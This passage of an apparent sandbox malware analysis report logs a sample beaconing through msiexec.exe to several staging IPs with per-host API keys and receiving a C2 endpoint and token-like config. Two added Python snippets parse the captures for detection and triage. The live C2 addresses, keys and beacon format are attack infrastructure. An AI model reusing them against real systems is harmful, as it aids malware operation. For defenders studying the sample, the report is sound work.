                          Dec 4, 2024 23:24:02.673320055 CET | 80 | 49743 | 91.212.166.91 | 192.168.2.4
                          Dec 4, 2024 23:24:02.673404932 CET | 49743 | 80 | 192.168.2.4 | 91.212.166.91
                          Dec 4, 2024 23:24:03.929549932 CET | 49744 | 80 | 192.168.2.4 | 188.130.206.243
                          Dec 4, 2024 23:24:03.930352926 CET | 49757 | 80 | 192.168.2.4 | 38.180.205.164
                          Dec 4, 2024 23:24:04.050194025 CET | 80 | 49757 | 38.180.205.164 | 192.168.2.4
                          Dec 4, 2024 23:24:04.053621054 CET | 49757 | 80 | 192.168.2.4 | 38.180.205.164
                          Dec 4, 2024 23:24:04.053802967 CET | 49757 | 80 | 192.168.2.4 | 38.180.205.164
                          Dec 4, 2024 23:24:04.090552092 CET | 80 | 49744 | 188.130.206.243 | 192.168.2.4
                          Dec 4, 2024 23:24:04.173731089 CET | 80 | 49757 | 38.180.205.164 | 192.168.2.4
                          Dec 4, 2024 23:24:04.461545944 CET | 80 | 49742 | 46.8.236.61 | 192.168.2.4
                          Dec 4, 2024 23:24:04.461620092 CET | 49742 | 80 | 192.168.2.4 | 46.8.236.61
                          Dec 4, 2024 23:24:05.961430073 CET | 80 | 49757 | 38.180.205.164 | 192.168.2.4
                          Dec 4, 2024 23:24:05.967540979 CET | 49763 | 28250 | 192.168.2.4 | 185.121.233.152
                          Dec 4, 2024 23:24:06.014497042 CET | 49757 | 80 | 192.168.2.4 | 38.180.205.164
                          Dec 4, 2024 23:24:06.087333918 CET | 28250 | 49763 | 185.121.233.152 | 192.168.2.4
                          Dec 4, 2024 23:24:06.087649107 CET | 49763 | 28250 | 192.168.2.4 | 185.121.233.152
                          Dec 4, 2024 23:24:07.286690950 CET | 28250 | 49763 | 185.121.233.152 | 192.168.2.4
                          Dec 4, 2024 23:24:07.286895990 CET | 49763 | 28250 | 192.168.2.4 | 185.121.233.152
                          Dec 4, 2024 23:24:07.406651974 CET | 28250 | 49763 | 185.121.233.152 | 192.168.2.4
                          Dec 4, 2024 23:24:15.929838896 CET | 80 | 49744 | 188.130.206.243 | 192.168.2.4
                          Dec 4, 2024 23:24:15.929977894 CET | 49744 | 80 | 192.168.2.4 | 188.130.206.243
                          Dec 4, 2024 23:24:22.412502050 CET | 49763 | 28250 | 192.168.2.4 | 185.121.233.152
                          Dec 4, 2024 23:24:22.532269001 CET | 28250 | 49763 | 185.121.233.152 | 192.168.2.4
                          Dec 4, 2024 23:24:27.128722906 CET | 28250 | 49763 | 185.121.233.152 | 192.168.2.4
                          Dec 4, 2024 23:24:27.128876925 CET | 49763 | 28250 | 192.168.2.4 | 185.121.233.152
                          Dec 4, 2024 23:24:27.248532057 CET | 28250 | 49763 | 185.121.233.152 | 192.168.2.4
                          Dec 4, 2024 23:24:35.973332882 CET | 49757 | 80 | 192.168.2.4 | 38.180.205.164
                          Dec 4, 2024 23:24:36.083071947 CET | 49763 | 28250 | 192.168.2.4 | 185.121.233.152
                          Dec 4, 2024 23:24:36.093136072 CET | 80 | 49757 | 38.180.205.164 | 192.168.2.4
                          Dec 4, 2024 23:24:36.202979088 CET | 28250 | 49763 | 185.121.233.152 | 192.168.2.4
                          Dec 4, 2024 23:24:36.469876051 CET | 28250 | 49763 | 185.121.233.152 | 192.168.2.4
                          Dec 4, 2024 23:24:36.517687082 CET | 49763 | 28250 | 192.168.2.4 | 185.121.233.152
                          Dec 4, 2024 23:24:47.516107082 CET | 28250 | 49763 | 185.121.233.152 | 192.168.2.4
                          Dec 4, 2024 23:24:47.516365051 CET | 49763 | 28250 | 192.168.2.4 | 185.121.233.152
                          Dec 4, 2024 23:24:47.636079073 CET | 28250 | 49763 | 185.121.233.152 | 192.168.2.4
                          Dec 4, 2024 23:25:02.641793966 CET | 49763 | 28250 | 192.168.2.4 | 185.121.233.152
                          Dec 4, 2024 23:25:02.761646032 CET | 28250 | 49763 | 185.121.233.152 | 192.168.2.4
                          Dec 4, 2024 23:25:06.094912052 CET | 49757 | 80 | 192.168.2.4 | 38.180.205.164
                          Dec 4, 2024 23:25:06.217379093 CET | 80 | 49757 | 38.180.205.164 | 192.168.2.4
                          Dec 4, 2024 23:25:06.485685110 CET | 49763 | 28250 | 192.168.2.4 | 185.121.233.152
                          Dec 4, 2024 23:25:06.605407000 CET | 28250 | 49763 | 185.121.233.152 | 192.168.2.4
                          Dec 4, 2024 23:25:06.874191999 CET | 28250 | 49763 | 185.121.233.152 | 192.168.2.4
                          Dec 4, 2024 23:25:06.923664093 CET | 49763 | 28250 | 192.168.2.4 | 185.121.233.152
                          Dec 4, 2024 23:25:07.904146910 CET | 28250 | 49763 | 185.121.233.152 | 192.168.2.4
                          Dec 4, 2024 23:25:07.948724985 CET | 49763 | 28250 | 192.168.2.4 | 185.121.233.152
                          • 46.8.232.106
                          • 46.8.236.61
                          • 91.212.166.91
                          • 188.130.206.243
                          • 38.180.205.164
                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          0 | 192.168.2.4 | 49741 | 46.8.232.106 | 80 | 8024 | C:\Windows\SysWOW64\msiexec.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Dec 4, 2024 23:23:32.534853935 CET | 302 | OUT | POST / HTTP/1.1
                          Host: 46.8.232.106
                          User-Agent: Go-http-client/1.1
                          Content-Length: 166
                          X-Api-Key: RevesNFj
                          Accept-Encoding: gzip
                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 2e 36 58 01 2b 23 33 31 3c 1b 15 0d 0a 20 0a 2b 07 19 02 0f 1d 27 1e 28 13 35 3f 27 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 0a 22 12 23 16 09 01 32 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 2c 5e 2b 0e 14 09 1e 1b 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 59 10 27 41 2d 23 2c 54 2a 37 37 44 45 45 0e 0b 5b 44 53 45 5a 0b 5e 5f 0d 04 52 0a 0a 07 5e 53 56 0e 5b 00 51 50 56 5a 5d 56 5d 5f 06 5a 59 50 5b 57 00 09 4c 1b
                          Data Ascii: M*L\K.6X+#31< +'(5?'DEE2MTD"#2ACL>K]A,^+DEE1AULVY'A-#,T*77DEE[DSEZ^_R^SV[QPVZ]V]_ZYP[WL


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          1 | 192.168.2.4 | 49742 | 46.8.236.61 | 80 | 8024 | C:\Windows\SysWOW64\msiexec.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Dec 4, 2024 23:23:42.532676935 CET | 301 | OUT | POST / HTTP/1.1
                          Host: 46.8.236.61
                          User-Agent: Go-http-client/1.1
                          Content-Length: 166
                          X-Api-Key: 4l7XKmIh
                          Accept-Encoding: gzip
                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 2e 36 58 01 2b 23 33 31 3c 1b 15 0d 0a 20 0a 2b 07 19 02 0f 1d 27 1e 28 13 35 3f 27 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 0a 22 12 23 16 09 01 32 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 2c 5e 2b 0e 14 09 1e 1b 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 59 10 27 41 2d 23 2c 54 2a 37 37 44 45 45 0e 0b 5b 44 53 45 5a 0b 5e 5f 0d 04 52 0a 0a 07 5e 53 56 0e 5b 00 51 50 56 5a 5d 56 5d 5f 06 5a 59 50 5b 57 00 09 4c 1b
                          Data Ascii: M*L\K.6X+#31< +'(5?'DEE2MTD"#2ACL>K]A,^+DEE1AULVY'A-#,T*77DEE[DSEZ^_R^SV[QPVZ]V]_ZYP[WL


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          2 | 192.168.2.4 | 49743 | 91.212.166.91 | 80 | 8024 | C:\Windows\SysWOW64\msiexec.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Dec 4, 2024 23:23:52.545561075 CET | 303 | OUT | POST / HTTP/1.1
                          Host: 91.212.166.91
                          User-Agent: Go-http-client/1.1
                          Content-Length: 166
                          X-Api-Key: WN3Xwx7a
                          Accept-Encoding: gzip
                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 2e 36 58 01 2b 23 33 31 3c 1b 15 0d 0a 20 0a 2b 07 19 02 0f 1d 27 1e 28 13 35 3f 27 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 0a 22 12 23 16 09 01 32 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 2c 5e 2b 0e 14 09 1e 1b 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 59 10 27 41 2d 23 2c 54 2a 37 37 44 45 45 0e 0b 5b 44 53 45 5a 0b 5e 5f 0d 04 52 0a 0a 07 5e 53 56 0e 5b 00 51 50 56 5a 5d 56 5d 5f 06 5a 59 50 5b 57 00 09 4c 1b
                          Data Ascii: M*L\K.6X+#31< +'(5?'DEE2MTD"#2ACL>K]A,^+DEE1AULVY'A-#,T*77DEE[DSEZ^_R^SV[QPVZ]V]_ZYP[WL
                          Dec 4, 2024 23:23:53.901345015 CET | 183 | IN | HTTP/1.1 429 Too Many Requests
                          Content-Type: text/plain; charset=utf-8
                          X-Content-Type-Options: nosniff
                          Date: Wed, 04 Dec 2024 22:23:53 GMT
                          Content-Length: 18
                          Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                          Data Ascii: Too many requests


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          3 | 192.168.2.4 | 49744 | 188.130.206.243 | 80 | 8024 | C:\Windows\SysWOW64\msiexec.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Dec 4, 2024 23:23:54.023226976 CET | 305 | OUT | POST / HTTP/1.1
                          Host: 188.130.206.243
                          User-Agent: Go-http-client/1.1
                          Content-Length: 166
                          X-Api-Key: PnB4uTNY
                          Accept-Encoding: gzip
                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 2e 36 58 01 2b 23 33 31 3c 1b 15 0d 0a 20 0a 2b 07 19 02 0f 1d 27 1e 28 13 35 3f 27 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 0a 22 12 23 16 09 01 32 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 2c 5e 2b 0e 14 09 1e 1b 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 59 10 27 41 2d 23 2c 54 2a 37 37 44 45 45 0e 0b 5b 44 53 45 5a 0b 5e 5f 0d 04 52 0a 0a 07 5e 53 56 0e 5b 00 51 50 56 5a 5d 56 5d 5f 06 5a 59 50 5b 57 00 09 4c 1b
                          Data Ascii: M*L\K.6X+#31< +'(5?'DEE2MTD"#2ACL>K]A,^+DEE1AULVY'A-#,T*77DEE[DSEZ^_R^SV[QPVZ]V]_ZYP[WL


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          4 | 192.168.2.4 | 49757 | 38.180.205.164 | 80 | 8024 | C:\Windows\SysWOW64\msiexec.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Dec 4, 2024 23:24:04.053802967 CET | 304 | OUT | POST / HTTP/1.1
                          Host: 38.180.205.164
                          User-Agent: Go-http-client/1.1
                          Content-Length: 166
                          X-Api-Key: FBNFqv4X
                          Accept-Encoding: gzip
                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 2e 36 58 01 2b 23 33 31 3c 1b 15 0d 0a 20 0a 2b 07 19 02 0f 1d 27 1e 28 13 35 3f 27 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 0a 22 12 23 16 09 01 32 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 2c 5e 2b 0e 14 09 1e 1b 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 59 10 27 41 2d 23 2c 54 2a 37 37 44 45 45 0e 0b 5b 44 53 45 5a 0b 5e 5f 0d 04 52 0a 0a 07 5e 53 56 0e 5b 00 51 50 56 5a 5d 56 5d 5f 06 5a 59 50 5b 57 00 09 4c 1b
                          Data Ascii: M*L\K.6X+#31< +'(5?'DEE2MTD"#2ACL>K]A,^+DEE1AULVY'A-#,T*77DEE[DSEZ^_R^SV[QPVZ]V]_ZYP[WL
                          Dec 4, 2024 23:24:05.961430073 CET | 388 | IN | HTTP/1.1 200 OK
                          Date: Wed, 04 Dec 2024 22:24:05 GMT
                          Content-Length: 270
                          Content-Type: text/plain; charset=utf-8
                          Data Raw: 31 38 35 2e 31 32 31 2e 32 33 33 2e 31 35 32 3b 32 38 32 35 30 3b 68 33 69 67 74 70 68 69 74 63 4d 63 70 36 6a 34 3a 6d 6d 51 2f 35 78 4c 2f 74 59 33 39 51 76 6d 31 42 4c 36 2e 65 31 77 32 59 6f 56 31 6a 49 63 32 66 78 42 2e 32 66 65 31 63 55 48 36 58 52 78 36 5a 67 48 2e 50 7a 64 39 67 6c 66 31 67 71 38 2c 46 30 63 68 6b 4d 4b 74 34 64 49 74 6f 51 31 70 51 4a 63 3a 54 42 47 2f 4e 47 77 2f 5a 37 65 33 6d 56 64 38 33 33 4e 2e 79 34 42 31 6d 4f 47 38 46 39 37 30 62 47 57 2e 52 44 6e 32 30 33 34 30 74 55 65 35 67 50 71 2e 4e 37 43 31 75 76 57 36 58 57 71 34 51 68 30 2c 34 5a 67 68 47 50 7a 74 4d 57 66 74 66 76 78 70 6d 4a 69 3a 76 68 72 2f 70 30 61 2f 38 69 64 39 53 4c 6e 31 53 6d 6f 2e 59 63 4d 32 4c 36 4a 31 6e 4b 62 32 31 35 6a 2e 72 77 6a 31 36 5a 59 36 34 56 73 36 78 53 76 2e 58 77 30 39 42 49 41
                          Data Ascii: 185.121.233.152;28250;h3igtphitcMcp6j4:mmQ/5xL/tY39Qvm1BL6.e1w2YoV1jIc2fxB.2fe1cUH6XRx6ZgH.Pzd9glf1gq8,F0chkMKt4dItoQ1pQJc:TBG/NGw/Z7e3mVd833N.y4B1mOG8F970bGW.RDn20340tUe5gPq.N7C1uvW6XWq4Qh0,4ZghGPztMWftfvxpmJi:vhr/p0a/8id9SLn1Smo.YcM2L6J1nKb215j.rwj16ZY64Vs6xSv.Xw09BIA
                          Dec 4, 2024 23:24:35.973332882 CET | 6 | OUT | Data Raw: 00
                          Data Ascii:
                          Dec 4, 2024 23:25:06.094912052 CET | 6 | OUT | Data Raw: 00
                          Data Ascii:
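
The five HTTP sessions above share one request shape (POST /, User-Agent Go-http-client/1.1, Content-Length 166, an 8-character X-Api-Key that differs per host), and the packet list shows the sample moving to the next host roughly every 10 seconds, moving on immediately after the 429 from 91.212.166.91, and opening 192.168.2.4:49763 to 185.121.233.152:28250 about 6 ms after the 200 OK from 38.180.205.164 whose 270-byte body starts with exactly that address and port. The following Python is an added example, not part of the Joe Sandbox report: it reparses the captured request heads and reply bodies to pull out the staging hosts, the per-host keys and the next-hop C2 endpoint. The request text and reply bodies are copied from the sessions above; the 166-byte POST body is omitted because nothing here depends on it. The beacon fingerprint and the entry-shape regex are assumptions derived from this one sample, and the third field of the reply is left uninterpreted because the page does not establish its meaning.

```python
"""Reparse the staging exchange captured in the HTTP sessions above.

Added example, not part of the Joe Sandbox report. Request heads and reply
bodies are copied from the session dumps; the 166-byte POST body is omitted.
The fingerprint and the entry regex are assumptions from this one sample.
"""
import ipaddress
import re
from dataclasses import dataclass

# Body of the 200 OK from 38.180.205.164 (session 4), Content-Length 270.
STAGING_RESPONSE_BODY = (
    "185.121.233.152;28250;"
    "h3igtphitcMcp6j4:mmQ/5xL/tY39Qvm1BL6.e1w2YoV1jIc2fxB.2fe1cUH6XRx6ZgH.Pzd9glf1gq8,"
    "F0chkMKt4dItoQ1pQJc:TBG/NGw/Z7e3mVd833N.y4B1mOG8F970bGW.RDn20340tUe5gPq.N7C1uvW6XWq4Qh0,"
    "4ZghGPztMWftfvxpmJi:vhr/p0a/8id9SLn1Smo.YcM2L6J1nKb215j.rwj16ZY64Vs6xSv.Xw09BIA"
)

# Sessions 0-4 above: (Host header, X-Api-Key, (status, body) or None if no reply).
SESSIONS = [
    ("46.8.232.106", "RevesNFj", None),
    ("46.8.236.61", "4l7XKmIh", None),
    ("91.212.166.91", "WN3Xwx7a", (429, "Too many requests\n")),
    ("188.130.206.243", "PnB4uTNY", None),
    ("38.180.205.164", "FBNFqv4X", (200, STAGING_RESPONSE_BODY)),
]


def build_request(host: str, api_key: str) -> str:
    """Request head of the POSTs above; only Host and X-Api-Key vary per session."""
    return (
        "POST / HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "User-Agent: Go-http-client/1.1\r\n"
        "Content-Length: 166\r\n"
        f"X-Api-Key: {api_key}\r\n"
        "Accept-Encoding: gzip\r\n\r\n"
    )


def parse_http_request(raw: str) -> dict:
    """Split an HTTP/1.1 request head into method, target and lower-cased headers."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version, "headers": headers}


API_KEY_RE = re.compile(r"^[A-Za-z0-9]{8}$")  # every key above is 8 alphanumerics


def matches_staging_beacon(req: dict) -> bool:
    """True for the request shape shared by all five sessions above (assumed fingerprint)."""
    h = req["headers"]
    return (
        req["method"] == "POST"
        and req["target"] == "/"
        and h.get("user-agent") == "Go-http-client/1.1"
        and h.get("content-length") == "166"
        and API_KEY_RE.match(h.get("x-api-key", "")) is not None
    )


@dataclass(frozen=True)
class StagerConfig:
    host: str
    port: int
    entries: tuple  # third field split on ',', deliberately left uninterpreted


# Shape of each comma-separated entry in the body above: label:a/b/c.d.e.f
ENTRY_RE = re.compile(r"^[A-Za-z0-9]+:[A-Za-z0-9]+/[A-Za-z0-9]+/[A-Za-z0-9.]+$")


def parse_stager_response(body: str) -> StagerConfig:
    """Parse '<ip>;<port>;<entry>,<entry>,...'; only host and port are interpreted.

    The packet list above shows the sample connecting to 185.121.233.152:28250
    a few milliseconds after this body arrived, which is what host/port feed.
    """
    host, port_s, rest = body.split(";", 2)
    ipaddress.ip_address(host)  # ValueError if the first field is not an IP
    port = int(port_s)
    if not 0 < port < 65536:
        raise ValueError(f"port out of range: {port}")
    entries = tuple(rest.split(","))
    for entry in entries:
        if not ENTRY_RE.match(entry):
            raise ValueError(f"unexpected entry shape: {entry!r}")
    return StagerConfig(host, port, entries)


def extract_indicators(sessions) -> dict:
    """Collect staging hosts, per-host keys, rate-limited hosts and the next hop."""
    out = {"staging_hosts": [], "api_keys": [], "rate_limited": [], "next_hop": None}
    for host, key, reply in sessions:
        req = parse_http_request(build_request(host, key))
        if not matches_staging_beacon(req):
            continue
        out["staging_hosts"].append(req["headers"]["host"])
        out["api_keys"].append(req["headers"]["x-api-key"])
        if reply is None:
            continue
        status, body = reply
        if status == 429:
            out["rate_limited"].append(host)
        elif status == 200:
            cfg = parse_stager_response(body)
            out["next_hop"] = (cfg.host, cfg.port)
    return out
```

Running extract_indicators(SESSIONS) yields the five staging hosts, the five keys, 91.212.166.91 as the only rate-limited host, and ("185.121.233.152", 28250) as the next hop, which is the endpoint the three Suricata alerts above fire on. The fingerprint is deliberately narrow (it keys on Content-Length 166, which another build or a different victim profile may change), so treat it as a hunting query for this sample rather than a general Go-beacon signature.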


                          Target ID:0
                          Start time:17:22:59
                          Start date:04/12/2024
                          Path:C:\Users\user\Desktop\reduce.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Users\user\Desktop\reduce.exe"
                          Imagebase:0x100000000
                          File size:18'233'144 bytes
                          MD5 hash:B0F4C61F99716127097DA80D07ED6123
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          Target ID:1
                          Start time:17:23:02
                          Start date:04/12/2024
                          Path:C:\Windows\SysWOW64\more.com
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\more.com
                          Imagebase:0x830000
                          File size:24'576 bytes
                          MD5 hash:03805AE7E8CBC07840108F5C80CF4973
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:moderate
                          Has exited:true

                          Target ID:2
                          Start time:17:23:02
                          Start date:04/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:7
                          Start time:17:23:25
                          Start date:04/12/2024
                          Path:C:\Windows\SysWOW64\msiexec.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\msiexec.exe
                          Imagebase:0x9b0000
                          File size:59'904 bytes
                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:false

                          Target ID:8
                          Start time:17:23:26
                          Start date:04/12/2024
                          Path:C:\Users\user\AppData\Roaming\jion\Client32.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Users\user\AppData\Roaming\jion\Client32.exe"
                          Imagebase:0x100000000
                          File size:18'233'144 bytes
                          MD5 hash:B0F4C61F99716127097DA80D07ED6123
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          Target ID:9
                          Start time:17:23:29
                          Start date:04/12/2024
                          Path:C:\Windows\SysWOW64\more.com
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\more.com
                          Imagebase:0x830000
                          File size:24'576 bytes
                          MD5 hash:03805AE7E8CBC07840108F5C80CF4973
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:moderate
                          Has exited:true

                          Target ID:10
                          Start time:17:23:29
                          Start date:04/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:11
                          Start time:17:23:44
                          Start date:04/12/2024
                          Path:C:\Windows\SysWOW64\msiexec.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\msiexec.exe
                          Imagebase:0x9b0000
                          File size:59'904 bytes
                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true
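
Two things in the Target list above are worth turning into checks: the binary at C:\Users\user\AppData\Roaming\jion\Client32.exe has the same MD5 and file size as reduce.exe, and more.com and msiexec.exe are both launched with no arguments at all, with msiexec.exe then appearing as the client process in every HTTP session above. The following Python is an added example, not part of the Joe Sandbox report: it transcribes those Target entries into records and runs three checks over them. The record fields come from the blocks above and the network-client set from the session table; the rule names are this example's own.

```python
"""Triage the process list above: same hash under two paths, argument-less
Windows binaries, and a Windows binary acting as the HTTP client.

Added example, not part of the Joe Sandbox report. PROCS is transcribed from
the Target ID blocks; NETWORK_CLIENT_PATHS from the session table's Process
column. Rule names are this example's own.
"""
from collections import defaultdict
from dataclasses import dataclass
from pathlib import PureWindowsPath


@dataclass(frozen=True)
class Proc:
    target_id: int
    path: str
    cmdline: str
    md5: str
    size: int
    wow64: bool
    admin: bool


MD5_SAMPLE = "B0F4C61F99716127097DA80D07ED6123"
MD5_MORE = "03805AE7E8CBC07840108F5C80CF4973"
MD5_CONHOST = "0D698AF330FD17BEE3BF90011D49251D"
MD5_MSIEXEC = "9D09DC1EDA745A5F87553048E57620CF"
CONHOST_CMD = r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"

# Transcribed from the Target ID blocks above (elevated run, then the non-elevated rerun).
PROCS = [
    Proc(0, r"C:\Users\user\Desktop\reduce.exe", r'"C:\Users\user\Desktop\reduce.exe"', MD5_SAMPLE, 18_233_144, False, True),
    Proc(1, r"C:\Windows\SysWOW64\more.com", r"C:\Windows\SysWOW64\more.com", MD5_MORE, 24_576, True, True),
    Proc(2, r"C:\Windows\System32\conhost.exe", CONHOST_CMD, MD5_CONHOST, 862_208, False, True),
    Proc(7, r"C:\Windows\SysWOW64\msiexec.exe", r"C:\Windows\SysWOW64\msiexec.exe", MD5_MSIEXEC, 59_904, True, True),
    Proc(8, r"C:\Users\user\AppData\Roaming\jion\Client32.exe", r'"C:\Users\user\AppData\Roaming\jion\Client32.exe"', MD5_SAMPLE, 18_233_144, False, False),
    Proc(9, r"C:\Windows\SysWOW64\more.com", r"C:\Windows\SysWOW64\more.com", MD5_MORE, 24_576, True, False),
    Proc(10, r"C:\Windows\System32\conhost.exe", CONHOST_CMD, MD5_CONHOST, 862_208, False, False),
    Proc(11, r"C:\Windows\SysWOW64\msiexec.exe", r"C:\Windows\SysWOW64\msiexec.exe", MD5_MSIEXEC, 59_904, True, False),
]

# Process column of the HTTP session table above (all five sessions).
NETWORK_CLIENT_PATHS = {r"C:\Windows\SysWOW64\msiexec.exe"}


def is_windows_binary(path: str) -> bool:
    return path.lower().startswith("c:\\windows\\")


def same_hash_multiple_paths(procs) -> dict:
    """MD5 -> sorted distinct paths, for every hash seen under more than one path."""
    paths = defaultdict(set)
    for p in procs:
        paths[p.md5.upper()].add(p.path)
    return {h: sorted(ps) for h, ps in paths.items() if len(ps) > 1}


def argless_windows_binaries(procs) -> list:
    """Image names of Windows binaries whose command line is just the image path."""
    names = set()
    for p in procs:
        if is_windows_binary(p.path) and p.cmdline.strip('"').lower() == p.path.lower():
            names.add(PureWindowsPath(p.path).name.lower())
    return sorted(names)


def lolbin_network_clients(procs, network_paths) -> list:
    """Windows binaries from the process list that the session table shows talking out."""
    windows = {p.path for p in procs if is_windows_binary(p.path)}
    return sorted(windows & set(network_paths))


def triage(procs, network_paths) -> dict:
    return {
        "same_hash_multiple_paths": same_hash_multiple_paths(procs),
        "argless_windows_binaries": argless_windows_binaries(procs),
        "lolbin_network_clients": lolbin_network_clients(procs, network_paths),
    }
```

triage(PROCS, NETWORK_CLIENT_PATHS) reports the sample's MD5 under both the Desktop and the AppData\Roaming\jion path, more.com and msiexec.exe as the argument-less Windows binaries, and msiexec.exe as the one that carried the HTTP sessions. Matching on the bare command line is what makes the msiexec case stand out: a legitimate install passes a package or a /i, /x or /q switch, and more.com launched with nothing to page through has no normal reason to exist.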


                            Execution Graph

                            Execution Coverage:34.8%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:0%
                            Total number of Nodes:9
                            Total number of Limit Nodes:0
                            execution_graph 86 1000030a0 87 1000030ca 86->87 90 1000190a0 87->90 91 1000190ba 90->91 92 1000190f0 91->92 95 100018f80 92->95 94 1000030db 97 100018f92 95->97 96 100019084 ExitProcess 96->94 97->96

                            Callgraph

                            Control-flow Graph

                            Memory Dump Source
                            • Source File: 00000000.00000002.1719435664.0000000100001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000100000000, based on PE: true
                            • Associated: 00000000.00000002.1719420329.0000000100000000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1719793949.00000001005E6000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1719808255.00000001005ED000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1719873607.0000000100637000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1719885626.0000000100639000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1719936225.000000010063A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1719947395.000000010063B000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1719959534.000000010063E000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1719971578.0000000100640000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1719985238.000000010064F000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1719997011.0000000100652000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1720009292.0000000100653000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1720094571.0000000100654000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1720107785.0000000100657000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1720120775.000000010065C000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1720133215.0000000100663000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1720145160.0000000100664000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1720157421.0000000100665000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1720170049.0000000100666000.00000002.00000001.01000000.00000003.sdmp
